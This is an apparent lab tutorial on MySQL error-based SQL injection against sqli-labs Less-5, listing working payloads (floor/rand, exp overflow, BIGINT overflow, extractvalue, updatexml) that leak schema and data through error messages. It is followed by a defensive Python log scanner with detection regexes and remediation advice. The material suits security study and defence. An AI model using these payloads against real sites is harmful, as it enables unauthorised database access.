Error-based injection via floor()
?id=1 and (select count(*) from information_schema.tables group by concat((select database()),floor(rand(0)*2)))
?id=1 and (select count(*) from information_schema.tables group by concat((select concat(schema_name) from information_schema.schemata limit 0,1),floor(rand(0)*2)))
Payload: change the inner select query so that the data is extracted through the error message.
Error-based injection: exp()
~0: bitwise NOT of 0 is a very large value.
exp(xxx): raises an error when xxx is greater than 709.
Because a function that executes successfully returns 0, applying bitwise NOT to the successfully executed function gives the maximum unsigned BIGINT value.
So it only takes exp(~(a search statement constructed so that it executes successfully)) to raise the error, and when exp() raises the error it also executes the statement inside it and outputs the result.
http://192.168.129.191:8001/Less-5/?id=1' and exp(~(select * from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x))--+
http://192.168.129.191:8001/Less-5/?id=1' and exp(~(select * from(select group_concat(column_name) from information_schema.columns where table_name='users')x))--+
Error-based injection: BIGINT overflow error
http://192.168.129.191:8001/Less-5/?id=1' and !(select * from(select group_concat(column_name) from information_schema.columns where table_name='users')x)-~0 --+
Subtracting ~0 from the search result causes an overflow error, so the error message prints the desired result.
Error-based injection: extractvalue
http://192.168.129.191:8001/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+
http://192.168.129.191:8001/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e))--+
Error-based injection: updatexml
http://192.168.129.191:8001/Less-5/?id=1' and updatexml(1,concat(0x7e,(select @@datadir),0x7e),1)--+
http://192.168.129.191:8001/Less-5/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)--+
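All five techniques on this page (floor()/rand() with group by, exp(~...), the !(select ...)-~0 BIGINT overflow, extractvalue() and updatexml()) leak data through a MySQL error message, so from the defender's side they share one detection point: the web server request log. The script below is an added example, not code from the original post or from sqli-labs. It scans constructed Apache-style access-log lines (the IPs, timestamps and Less-5 paths are placeholders), percent-decodes each query string, and reports which of the five payload shapes it matches.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (combined log format); NOT taken from the original
# page or from sqli-labs. Lines 1-5 carry the five error-based payload shapes discussed
# on the page, lines 6-7 are benign requests.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /Less-5/?id=1%20and%20(select%20count(*)%20from%20information_schema.tables%20group%20by%20concat((select%20database()),floor(rand(0)*2))) HTTP/1.1" 500 312 "-" "curl/8.0"
192.0.2.11 - - [10/Oct/2023:13:55:40 +0000] "GET /Less-5/?id=1%27%20and%20exp(~(select%20*%20from(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1)x))--+ HTTP/1.1" 500 312 "-" "curl/8.0"
192.0.2.12 - - [10/Oct/2023:13:55:44 +0000] "GET /Less-5/?id=1%27%20and%20!(select%20*%20from(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)x)-~0%20--+ HTTP/1.1" 500 312 "-" "curl/8.0"
192.0.2.13 - - [10/Oct/2023:13:55:48 +0000] "GET /Less-5/?id=1%27%20and%20extractvalue(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),0x7e))--+ HTTP/1.1" 500 312 "-" "curl/8.0"
192.0.2.14 - - [10/Oct/2023:13:55:52 +0000] "GET /Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20@@datadir),0x7e),1)--+ HTTP/1.1" 500 312 "-" "curl/8.0"
192.0.2.20 - - [10/Oct/2023:13:56:01 +0000] "GET /Less-5/?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.21 - - [10/Oct/2023:13:56:05 +0000] "GET /search?q=exponential%20growth HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# One signature per technique on the page. They are applied to the DECODED query string
# and are case-insensitive; re.S lets ".*?" span anything between the two anchors.
SIGNATURES = {
    # "group by concat(..., floor(rand(0)*2))": duplicate-key error via rand()/floor()
    "floor_rand_groupby": re.compile(r"group\s+by\b.*?\bfloor\s*\(\s*rand\s*\(", re.I | re.S),
    # "exp(~(select ...))": DOUBLE overflow, argument above 709
    "exp_overflow": re.compile(r"\bexp\s*\(\s*~", re.I),
    # "!(select ...)-~0": BIGINT UNSIGNED arithmetic overflow
    "bigint_overflow": re.compile(r"!\s*\(\s*select\b.*?-\s*~\s*0", re.I | re.S),
    # XPath-error functions that echo their (malformed) argument back
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
}

# Client address and request target from a combined-format log line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')


def decode_query(query: str, rounds: int = 2) -> str:
    """Percent-decode up to `rounds` times so single- and double-encoded input normalise."""
    for _ in range(rounds):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query


def classify_query(query: str) -> list[str]:
    """Return the names of every error-based signature that matches the decoded query."""
    decoded = decode_query(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(log_text: str) -> list[tuple[str, str, list[str]]]:
    """Yield (client_ip, request_target, matched_signatures) for every suspicious line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        techniques = classify_query(urlsplit(m["target"]).query)
        if techniques:
            hits.append((m["ip"], m["target"], techniques))
    return hits


if __name__ == "__main__":
    for ip, target, techniques in scan_log(SAMPLE_LOG):
        print(f"{ip:<12} {','.join(techniques):<20} {target[:60]}...")
```

Decoding before matching matters: in a real log the quote, spaces and parentheses usually arrive percent-encoded and the trailing `--+` only becomes a `-- ` comment after decoding. The same signatures translate directly into WAF or IDS rules, and a spike of HTTP 500 responses on the same parameter is a useful secondary signal because every one of these payloads relies on the database error reaching the client. Detection is a stop-gap; the root fix is a parameterised query and a generic error page that never returns the database message.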